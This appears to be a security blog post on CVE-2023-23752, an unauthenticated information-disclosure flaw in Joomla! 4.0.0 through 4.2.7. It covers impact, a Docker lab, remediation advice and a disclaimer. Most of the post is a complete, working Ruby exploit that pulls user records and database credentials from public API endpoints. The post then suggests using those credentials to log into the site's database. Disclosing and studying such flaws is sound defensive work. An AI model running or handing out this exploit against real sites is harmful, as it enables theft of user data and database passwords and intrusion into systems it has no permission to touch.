CVE-2023-23752: Improper Access Control in Joomla! Versions 4.0.0 through 4.2.7

Introduction

CVE-2023-23752 refers to an information disclosure vulnerability found in Joomla! versions 4.0.0 through 4.2.7. This vulnerability arises due to improper access control mechanisms within the application, allowing unauthorized actors to access sensitive information through specific web service endpoints.

Technical Details

The vulnerability resides within the logic responsible for authorizing access to certain web service endpoints. An attacker can exploit this flaw by crafting a malicious request that bypasses the intended access checks. This unauthorized request can then potentially reveal sensitive information that should only be accessible with proper authentication.

Potential Impact

A successful exploit of CVE-2023-23752 could lead to the following consequences:

  • Information Disclosure: An attacker might be able to access sensitive data, including user information, system configuration details, or internal application data.

  • Lateral Movement: The disclosed information could be leveraged by the attacker to gain a foothold within the system and potentially move laterally to other vulnerable targets.

  • Denial-of-Service (DoS): In some scenarios, a large volume of malicious requests exploiting the vulnerability could overwhelm the web server, leading to a DoS attack.

Exploitation (Proof of Concept)

For proof of concept explanation, we first need to build a lab in our local environment to host a vulnerable version of Joomla. We can do it using the following docker compose:

version: '3.1'
services:
  joomla:
    image: joomla:4.2.7-php8.1-apache
    restart: always
    links:
      - joomladb:mysql
    ports:
      - "4242:80"
    environment:
      JOOMLA_DB_HOST: joomladb
      JOOMLA_DB_PASSWORD: "<DB_PASSWORD>"

  joomladb:
    image: mysql:8.0.32-debian
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: "<DB_PASSWORD>"        

Let's spin up the Joomla container and complete the installation:

docker-compose up

Once we have the container up and running and we finished the installation, we can start the exploitation of CVE-202-23752.

We are using the following ruby script to exploit the improper access control:

#!/usr/bin/env ruby
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'
doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}
  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help
  #{Paint['Parameters:', :red]}
    <url>       Root URL (base path) including HTTP scheme, port and root folder
  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen
DOCOPT
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption #{c['dbencryption']}"
end

begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']
  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end          

Here's a simplified explanation of how the above script works:

  • Setup: The script starts by importing necessary Ruby libraries for handling JSON, making HTTP requests, parsing command-line arguments, and colorizing terminal output.

  • Command-Line Interface (CLI): The script defines a command-line interface using a multi-line string (doc) and parses the command-line arguments using the docopt library. This allows users to specify the target URL of the vulnerable Joomla instance.

  • Main Functions:

    • fetch_users: Sends an HTTP GET request to the Joomla API endpoint to fetch user data.

    • parse_users: Parses the JSON response from the API to extract user information.

    • display_users: Formats and displays the extracted user information.

    • fetch_config: Sends an HTTP GET request to the Joomla API endpoint to fetch site configuration data.

    • parse_config: Parses the JSON response from the API to extract site configuration information.

    • display_config: Formats and displays the extracted site configuration information.

  • Execution:

    • The script parses the command-line arguments to determine the target Joomla instance's URL.

    • It calls the display_users and display_config functions to retrieve and display user and site configuration information from the vulnerable Joomla instance.

  • Exception Handling: The script catches and handles Docopt::Exit exceptions that may occur during command-line argument parsing.

Overall, this exploits CVE-2023-23752 by leveraging the Joomla API (/api/index.php/v1/users?public=true) to retrieve sensitive information, such as user credentials and site configuration details, from the target Joomla instance.

To perform the exploit, we will execute the script:

ruby exploit.rb http://<TARGET_JOOMLA_IP>

We can use the information retrieved by the exploit script in case of successful exploit to connect to the SQL database instance.

Remediation

Joomla! addressed this vulnerability in version 4.2.8. It is crucial to update Joomla! installations to this version or later as soon as possible to mitigate the risk associated with CVE-2023-23752.

Additional Considerations

  • System administrators should implement security best practices such as regularly patching systems, maintaining strong passwords, and implementing Web Application Firewalls (WAFs) to mitigate the risk of exploitation.

  • Restricting access to web service endpoints to authorized users and implementing additional access control mechanisms can further strengthen the security posture.

Conclusion

CVE-2023-23752 highlights the importance of proper access control mechanisms in web applications. By promptly patching vulnerable systems and implementing security best practices, system administrators can significantly reduce the risk of exploitation.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-23752 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.

CVE-2022-44268: Dissecting the ImageMagick Arbitrary File Disclosure Vulnerability
CVE-2022-44268: Dissecting the ImageMagick Arbitrary File Disclosure Vulnerability
2024-05-26
James McGill
Spring Cloud Gateway Actuator Code Injection (CVE-2022-22947): A Deeper Dive for Security Researchers
Spring Cloud Gateway Actuator Code Injection (CVE-2022-22947): A Deeper Dive for Security Researchers
2024-05-19
James McGill
CVE-2024-22416: CSRF Vulnerability in pyLoad (pyload-ng)
CVE-2024-22416: CSRF Vulnerability in pyLoad (pyload-ng)
2024-05-19
James McGill
CVE-2023-1177: Path Traversal Vulnerability in MLflow
CVE-2023-1177: Path Traversal Vulnerability in MLflow
2024-05-19
James McGill
CVE-2024-1561: Unauthorized Local File Read Vulnerability in Gradio Applications
CVE-2024-1561: Unauthorized Local File Read Vulnerability in Gradio Applications
2024-05-12
James McGill
CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)
CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)
2024-05-05
James McGill